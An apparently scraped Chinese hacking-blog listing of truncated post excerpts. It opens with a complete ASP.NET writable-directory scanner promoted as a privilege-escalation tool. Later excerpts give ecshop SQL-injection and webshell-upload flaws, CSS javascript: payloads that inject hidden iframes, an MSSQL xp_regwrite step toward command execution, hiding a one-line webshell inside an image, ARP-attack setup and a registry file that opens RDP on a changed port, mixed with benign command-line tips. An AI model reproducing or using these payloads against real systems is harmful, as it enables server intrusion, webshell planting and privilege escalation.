很好用！.NET 提权必备工具！

<%@ Page Language="C#" ValidateRequest="false" %>
<%@ Import Namespace="System.IO" %>
<%@ Import Namespace="System.Text" %>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head runat="server">
<title>ScanWrtieable</title>
</head>
<body>
<script runat="server">
protected void Page_Load(object sender, EventArgs e)
{
}
int cresults;
protected void ScanRights(DirectoryInfo cdir)
{
try
{
if (Int32.Parse(TextBox_stopat.Text) > 0)
{
if (cresults > Int32.Parse(TextBox_stopat.Text))
return;
}
DirectoryInfo[] subdirs = cdir.GetDirectories();
foreach (DirectoryInfo item in subdirs)
{
ScanRights(item);
}
if (File.Create(cdir.FullName + "\\test").CanWrite)
{
this.Lb_msg.Text += cdir.FullName+"<br/>";
cresults++;
}
}
catch { }
}
System.DateTime start = DateTime.Now;
protected void ClearAllThread_Click(object sender, EventArgs e)
{
this.Lb_msg .Text= "";
cresults = 0;
ScanRights(new DirectoryInfo(Fport_TextBox.Text));
TimeSpan usetime = System.DateTime.Now - start;
this.Lb_msg.Text +="usetime: "+ usetime.TotalSeconds.ToString();
}
</script>
<form id="form1" runat="server">
<div>
start<asp:TextBox ID="Fport_TextBox" runat="server" Text="c:\" Width="60px"></asp:TextBox>
Stopat <asp:TextBox ID="TextBox_stopat" runat="server" Text="5" Width="60px"></asp:TextBox>files
<asp:Button ID="Button" runat="server" OnClick="ClearAllThread_Click" Text="ScanWriterable" /><br />
<asp:Label ID="Lb_msg" runat="server" Text=""></asp:Label>
<br />
</div>
<div>code by <a href ="http://www.7747.net">[url]www.7747.net</a></div[/url]>
</form>
</body>
</html>
 

查看更多...

Tags: .net自动找可写

Windows7/win2008 提权0day

查看更多...

Tags: 0day win7 提权

影响2.5.x和2.6.x,其他版本未测试

goods_script.php44行:
 

    if (empty($_GET['type']))
    {
        ...
    }
    elseif ($_GET['type'] == 'collection')
    {
        ...
    }
    $sql .= " LIMIT " . (!empty($_GET['goods_num']) ? intval($_GET['goods_num']) : 10);
    $res = $db->query($sql);

$sql没有初始化,很明显的一个漏洞:)

查看更多...

首先来看一下xcopy的语法。

XCOPY source [destination] [/A | /M] [/D[:date]] [/P] [/S [/E]] [/V] [/W]
                           [/C] [/I] [/Q] [/F] [/L] [/G] [/H] [/R] [/T] [/U]
                           [/K] [/N] [/O] [/X] [/Y] [/-Y] [/Z] [/B]
                           [/EXCLUDE:file1[+file2][+file3]...]

查看更多...

Tags: xcopy 复制目录 命令行

照上面的用法用就可以了，不多说了。

查看更多...

Tags: ms11-011利用工具 ms11-011工具 ms11-011

假设我发现了我机器上的7899端口被占用了，我想知道是哪个进程占用了这个端口怎么办？

首先，打开cmd

输入netstat -aon|findstr "0.0.0.0:7899"

C:\Users\Administrator>netstat -ano|findstr "0.0.0.0:7899"
  TCP    0.0.0.0:7899           0.0.0.0:0              LISTENING       2656

查看更多...

Tags: 端口 进程 占用

------------------------------------------------------------------------------
Title:ecshop后台写shell 0day
Author: xhm1n9[ESST]
EMail:xhm1n9@0x70.com
Site: http://www.x-xox-x.net
Date: 2010-12-27 10:22:15
From: http://x-xox-x.net/exploit/11

3月份的东西，现在发出来。
adminedit_languages.php

    相关变量没过滤!

    elseif ($_REQUEST['act'] == 'edit')
{
    /* 语言项的路径 */
    $lang_file = isset($_POST['file_path']) ? trim($_POST['file_path']) : '';

    /* 替换前的语言项 */
    $src_items = !empty($_POST['item']) ? stripslashes_deep($_POST['item']) : '';

查看更多...

Tags: ecshop webshell ecshop拿shell

以下讨论的机子有
一个要攻击的机子：10.5.4.178
硬件地址：52:54:4C:98:EE:2F
我的机子： :10.5.3.69
硬件地址：52:54:4C:98:ED:C5
网关： 10.5.0.3
硬件地址：00:90:26:3D:0C:F3
一台交换机另一端口的机子：10.5.3.3
硬件地址：52:54:4C:98:ED:F7

查看更多...

网上流行的:
body
{
background-image: url('javascript:document.write("<Iframe src=http://192.168.0.5/test.htm width=0 height=0></iframe>")')
}
//此方法会使主页不正常.返回一片空白.
用弹窗.
body
{
background-image: url('javascript:open("http://192.168.0.5/test.htm")')
}
//弹出一个框.难看 易被发现.
改进一下:

查看更多...

首先开启沙盘模式：

exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1


然后利用jet.oledb执行系统命令

查看更多...

一 前言
二 for语句的基本用法
三 for /f 含变量延迟
四 for /r
五 for /d
六 for /l

查看更多...

Tags: bat for语句 for语句详解

WINVER检查WINDOWS版本
DXDIAG检查DIRECTX信息
MEM.EXE显示内存使用情况
SNDVOL32音量控制程序
SFC.EXE系统文件检查器
GPEDIT.MSC 组策略
REGEDIT.EXE 注册表
MSCONFIG.EXE 系统配置实用程序
CMD.EXE CMD命令提示符
 

查看更多...

Tags: cmd命令

查看更多...

Tags: discuz 7.2漏洞

查看更多...

Tags: 3389无法登陆 开了3389无法登陆

查看更多...

Tags: 入侵 监测 win

查看更多...

Tags: 蜜罐 技术

又来骗点流量用用，呵呵。

我们在拿shell的时候，经常会用到一些上传点。有时候编辑器会对图片格式进行检查，当然我们可以在文本前面加几个字符伪装一下。但有些变态一点的编辑器仍会拒绝这种文件的上传。至于他们做了什么检查我就没研究过了。

这时候我们就可以找一张图片，然后用c32，或者winhex，打开。千万不能用记事本哦，因为记事本不能保存2进制数据的。然后在靠后点的地方写入一句话，保存即可。

查看更多...

Tags: 图片 木马 技巧

查看更多...

Tags: xp vpn 服务器

Windows Registry Editor Version 5.00 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] 
"fDenyTSConnections"=dword:00000000 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] 
"PortNumber"=dword:00000D3D 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] 
"PortNumber"=dword:00000D3D 


第一项表示开启/关闭。0代表开启3389，1代表关闭。

下面两项表示端口，用calc计算一下，写入十六进制就可以了。

win2003和xp开关3389都是不需要重起的哦。

查看更多...

Tags: 注册表 3389

NO.1
http://www.md5decrypter.co.uk/
很棒，据说数据量为130亿条，个人查询下来感觉不错，很多国内的收费数据在上面都可以免费查到。
xfyy888这个数据在国内三个网站上都是需要付费的，此站可以查询到。
注：这个站的验证码是区分大小写的，注意一下。

查看更多...

Tags: md5